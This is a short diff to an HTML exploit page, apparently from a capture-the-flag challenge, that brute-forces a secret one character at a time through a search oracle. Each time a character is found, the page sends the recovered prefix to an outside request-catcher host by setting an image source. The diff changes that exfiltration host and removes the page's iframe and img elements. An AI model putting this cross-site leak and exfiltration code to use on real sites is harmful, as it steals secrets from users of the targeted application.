--- a/exserver.html
+++ b/exserver.html
@@ -1,5 +1,3 @@
-<iframe id="iframe"></iframe>
-<img id="img">
 <script>
     async function req(url) {
         return await new Promise((resolve, reject) => {
@@ -45,7 +43,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://smmsjxk.request.dreamhack.games/${secret}`;
+                    img.src = `https://pfwovsw.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
